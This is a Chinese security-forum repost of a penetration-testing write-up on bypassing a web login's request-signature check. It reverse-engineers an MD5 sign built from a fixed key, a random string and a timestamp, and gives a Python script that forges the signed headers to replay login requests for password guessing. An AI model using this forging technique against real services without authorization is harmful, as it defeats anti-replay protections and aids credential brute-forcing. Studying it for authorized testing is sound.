安全矩阵

 找回密码
 立即注册
搜索
查看: 1800|回复: 0

渗透测试过程中的sign签名算法破解

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-6-30 08:52:37 | 显示全部楼层 |阅读模式

渗透测试过程中的sign签名算法破解
原文链接:渗透测试过程中的sign签名算法破解
aboood web安全工具库 2022-06-30 00:00 发表于河南

1.sign签名算法概述
sign签名算法:通常用于参数签名,防止参数被非法篡改,常见的使用方式是对请求中的重要参数进行保护,也可以防止重复提交请求屏蔽爬虫等,通常sign值得生成方式为token+一定的随机数+时间戳,而后使用某种加密算法进行加密,做为接口中的一个参数sign来传递,也能够将sign放到请求头中。
2.实战破解
本次调试的目标为最近工作中遇到的渗透测试目标,在是使用brupsuite进行抓包后,数据包无法重复使用。在对目标进行密码破解等操作时受到不小的限制。

登录请求在第一次使用时可以正确发送并返回信息,再次使用时返回包中已经提示“已过期的签名”。


仔细查看请求头中可以看Request-Key、Request-DeviceCode、Request-Timestamp和Request-Sign四个字段,存在Sign可以推测是有签名验证机制。
在浏览器中搜索Request-Sign字段,成功在js文件中找到,分析Request-Sign值生成语句n['Request-Sign'] = so.MD5(Fs.requestSignKey + t + r).toString().toUpperCase(),其中的 r 的值为当前时间戳,t 的值为使用S_(e)函数生成的随机值。


在语句上下断点,当程序运行到断点时可以看到requestSignKey的值为一个固定字段,至此Request-Sign值得生成方式为md5(固定值+随机字符串+当前时间戳),Request-Key值为随机字符串,Request-DeviceCode值为deviceCode固定字段,Request-Timestamp为当前时间戳+“000”,在调试中还发现后端对于时间戳的验证时差在5秒以内,一旦超过这个数值范围,请求将做过期失效处理。

因为对时间戳的验证,后面只能编写的相应python脚本进行测试。
  1. import hashlib
  2. import time
  3. import requests


  4. def timestamp():
  5.     return str(int(time.time())) + "000"


  6. def md5(my_key):
  7.     return hashlib.md5(my_key.encode(encoding='UTF-8')).hexdigest()


  8. def test():
  9.     url = "http://10.10.10.206:8000/system/login/login/USERNAME?username=13612012345&password=eld6JpZhn2IHVC%2BioelGzg%3D%3D&type=USERNAME&captcha=48&randomStr=29511656081384846"
  10.     t = timestamp()
  11.     # Request-Key 使用的是固定值
  12.     key = "recruit_student@#" + "2yu874pp1k4" + t
  13.     headers = {
  14.         "Request-Key": "2yu874pp1k4",
  15.         "Request-DeviceCode": "deviceCode",
  16.         "Request-Timestamp": t,
  17.         "Request-Sign": md5(key).upper()
  18.     }
  19.     response = requests.get(url, headers=headers)
  20.     print(response.text)


  21. if __name__ == "__main__":
  22.     test()
复制代码
通过脚本运行结果可以看到Request-Sign值设置前后的效果,签名验证算法可以成功被绕过,渗透测试工作中可以继续进行之后其它方面的安全测试。


该内容转载自Freebuff

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 14:10 , Processed in 0.013187 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表